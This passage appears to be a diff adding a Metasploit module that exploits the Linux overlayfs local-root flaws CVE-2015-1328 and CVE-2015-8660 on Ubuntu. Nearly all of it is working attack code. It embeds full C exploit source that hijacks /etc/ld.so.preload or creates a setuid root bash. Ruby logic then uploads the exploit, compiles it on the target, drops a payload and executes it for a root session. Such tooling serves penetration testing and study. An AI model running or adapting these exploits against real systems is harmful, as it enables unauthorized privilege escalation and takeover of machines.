"lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) { + fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n"); + exit(-1); + } + file = ".access"; + chmod("/tmp/ns_sploit/work/work",0777); + } else file = "ns_last_pid"; + + chdir("/tmp/ns_sploit/o"); + rename(file,"ld.so.preload"); + + chdir("/"); + umount("/tmp/ns_sploit/o"); + fprintf(stderr,"mount #2\n"); + if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) { + if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) { + exit(-1); + } + chmod("/tmp/ns_sploit/work/work",0777); + } + + chmod("/tmp/ns_sploit/o/ld.so.preload",0777); + umount("/tmp/ns_sploit/o"); + } + + int + main(int argc, char **argv) + { + int status, fd, lib; + pid_t wrapper, init; + int clone_flags = CLONE_NEWNS | SIGCHLD; + + fprintf(stderr,"spawning threads\n"); + + if((wrapper = fork()) == 0) { + if(unshare(CLONE_NEWUSER) != 0) + fprintf(stderr, "failed to create new user namespace\n"); + + if((init = fork()) == 0) { + pid_t pid = + clone(child_exec, child_stack + (1024*1024), clone_flags, NULL); + if(pid < 0) { + fprintf(stderr, "failed to create new mount namespace\n"); + exit(-1); + } + + waitpid(pid, &status, 0); + + } + + waitpid(init, &status, 0); + return 0; + } + + usleep(300000); + + wait(NULL); + + fprintf(stderr,"child threads done\n"); + + fd = open("/etc/ld.so.preload",O_WRONLY); + + if(fd == -1) { + fprintf(stderr,"exploit failed\n"); + exit(-1); + } + + fprintf(stderr,"/etc/ld.so.preload created\n"); + fprintf(stderr,"creating shared library\n"); + lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777); + write(lib,LIB,strlen(LIB)); + close(lib); + lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w"); + if(lib != 0) { + fprintf(stderr,"couldn't create dynamic library\n"); + exit(-1); + } + write(fd,"/tmp/ofs-lib.so\n",16); + close(fd); + system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c"); + execl("/bin/su","su",NULL); + } + } + + # direct copy of code from exploit-db. There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size + # Exploit Title: overlayfs local root + # Date: 2016-01-05 + # Exploit Author: rebel + # Version: Ubuntu 14.04 LTS, 15.10 and more + # Tested on: Ubuntu 14.04 LTS, 15.10 + # CVE : CVE-2015-8660 + cve_2015_8660 = %q{ + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + + static char child_stack[1024*1024]; + + static int + child_exec(void *stuff) + { + system("rm -rf /tmp/haxhax"); + mkdir("/tmp/haxhax", 0777); + mkdir("/tmp/haxhax/w", 0777); + mkdir("/tmp/haxhax/u",0777); + mkdir("/tmp/haxhax/o",0777); + + if (mount("overlay", "/tmp/haxhax/o", "overlay", MS_MGC_VAL, "lowerdir=/bin,upperdir=/tmp/haxhax/u,workdir=/tmp/haxhax/w") != 0) { + fprintf(stderr,"mount failed..\n"); + } + + chmod("/tmp/haxhax/w/work",0777); + chdir("/tmp/haxhax/o"); + chmod("bash",04755); + chdir("/"); + umount("/tmp/haxhax/o"); + return 0; + } + + int + main(int argc, char **argv) + { + int status; + pid_t wrapper, init; + int clone_flags = CLONE_NEWNS | SIGCHLD; + struct stat s; + + if((wrapper = fork()) == 0) { + if(unshare(CLONE_NEWUSER) != 0) + fprintf(stderr, "failed to create new user namespace\n"); + + if((init = fork()) == 0) { + pid_t pid = + clone(child_exec, child_stack + (1024*1024), clone_flags, NULL); + if(pid < 0) { + fprintf(stderr, "failed to create new mount namespace\n"); + exit(-1); + } + + waitpid(pid, &status, 0); + + } + + waitpid(init, &status, 0); + return 0; + } + + usleep(300000); + + wait(NULL); + + stat("/tmp/haxhax/u/bash",&s); + + if(s.st_mode == 0x89ed) + execl("/tmp/haxhax/u/bash","bash","-p","-c","rm -rf /tmp/haxhax;python -c \"import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');\"",NULL); + + fprintf(stderr,"couldn't create suid :(\n"); + return -1; + } + } + + filename = rand_text_alphanumeric(8) + executable_path = "#{datastore['WritableDir']}/#{filename}" + payloadname = rand_text_alphanumeric(8) + payload_path = "#{datastore['WritableDir']}/#{payloadname}" + + def has_prereqs?() + gcc = cmd_exec('which gcc') + if gcc.include?('gcc') + vprint_good('gcc is installed') + else + print_error('gcc is not installed. Compiling will fail.') + end + return gcc.include?('gcc') + end + + compile = false + if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True' + if has_prereqs?() + compile = true + vprint_status('Live compiling exploit on system') + else + vprint_status('Dropping pre-compiled exploit on system') + end + end + if check != CheckCode::Appears + fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!') + end + + def upload_and_chmod(fname,fcontent) + print_status "Writing to #{fname} (#{fcontent.size} bytes)" + rm_f fname + write_file(fname, fcontent) + cmd_exec("chmod +x #{fname}") + #register_file_for_cleanup(fname) + end + + def on_new_session(session) + super + if target.name == 'CVE-2015-1328' + session.shell_command("/bin/su") #this doesnt work on meterpreter????? + end + end + + if compile + if target.name == 'CVE-2015-1328' + cve_2015_1328.gsub!(/execl\("\/bin\/su","su",NULL\);/, + "execl(\"#{payload_path}\",\"#{payloadname}\",NULL);") + upload_and_chmod("#{executable_path}.c", cve_2015_1328) + else + cve_2015_8660.gsub!(/os.execl\('\/bin\/bash','bash'\)/, + "os.execl('#{payload_path}','#{payloadname}')") + upload_and_chmod("#{executable_path}.c", cve_2015_8660) + end + vprint_status("Compiling #{executable_path}.c") + cmd_exec("gcc -o #{executable_path} #{executable_path}.c") #compile + register_file_for_cleanup(executable_path) + else + if target.name == 'CVE-2015-1328' + path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-1328', '1328') + fd = ::File.open( path, "rb") + cve_2015_1328 = fd.read(fd.stat.size) + fd.close + upload_and_chmod(executable_path, cve_2015_1328) + # overwrite with the hardcoded variable names in the compiled versions + payload_filename = 'cjKriIIN' + payload_path = '/tmp/cjKriIIN' + else + path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-8660', '8660') + fd = ::File.open( path, "rb") + cve_2015_8660 = fd.read(fd.stat.size) + fd.close + upload_and_chmod(executable_path, cve_2015_8660) + # overwrite with the hardcoded variable names in the compiled versions + payload_filename = '1H0qLaq2' + payload_path = '/tmp/1H0qLaq2' + end + end + + upload_and_chmod(payload_path, generate_payload_exe) + vprint_status('Exploiting...') + output = cmd_exec(executable_path) + output.each_line { |line| vprint_status(line.chomp) } + end +end